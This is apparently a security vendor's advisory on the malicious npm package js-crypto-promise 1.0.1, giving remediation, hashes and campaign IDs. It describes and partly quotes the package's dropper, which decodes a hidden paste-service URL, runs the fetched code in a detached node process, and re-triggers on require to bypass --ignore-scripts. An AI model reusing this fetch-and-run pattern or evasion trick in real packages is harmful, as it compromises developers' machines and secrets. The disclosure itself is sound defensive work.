Which versions of js-crypto-promise are malicious?

The following npm versions of js-crypto-promise are flagged malicious: 1.0.1. Treat any of these as compromised.

How do I remediate js-crypto-promise if I installed it?

Remove js-crypto-promise from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is js-crypto-promise part of a known attack campaign?

Yes — js-crypto-promise is associated with the IN-MAL-2026-005480, IN-MAL-2026-005479 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect js-crypto-promise in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking js-crypto-promise and packages like it before any post-install script runs.

Malicious package

js-crypto-promisenpm

Malicious code in js-crypto-promise (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5569

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall js-crypto-promise

What this malware does

The package's prepinstall.js script base64-decodes a hidden URL (stored in a constant misleadingly named HASH_KEY decoding to https://jsonkeeper.com/b/DWNFF, an anonymous paste service), fetches the JSON body via axios, reads the .cache field, and pipes the contents into a detached node child process via stdin: const child = spawn('node', [], { detached: true, stdio: ['pipe', 'ignore', 'ignore'] }); child.stdin.write(k1);. This dropper fires automatically on npm install via scripts.postinstall. To defeat the --ignore-scripts mitigation, index.js also wraps a dynamic import('./prepinstall.js') inside a top-level IIFE, so any consumer that require('js-crypto-promise') re-triggers the same remote fetch and execution. The payload host is mutable, anonymous, unpinned, and unverified — the package author can swap in arbitrary code at any time. The package name impersonates the legitimate crypto-promise package: the README copies the real package's example code and embeds the real package's npm badge link, and the homepage points at the legitimate maintainer's GitHub repo. Installer impact: any npm install or require() of this package executes attacker-controlled Node.js code on the installer's machine.

Malicious versions

1 flagged

1.0.1

Indicators of compromise (SHA-256)

0f5a7a6c89bed501873fcf3ed3eee38f5198ef5224d71038324f3543380feb5e

a9d677e45bee46911d04564e9260f4b569119a4ca0a13a58bcd43760359fbb4f

Frequently asked questions

No. js-crypto-promise on npm has been identified as a malicious package (version 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005480IN-MAL-2026-005479

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection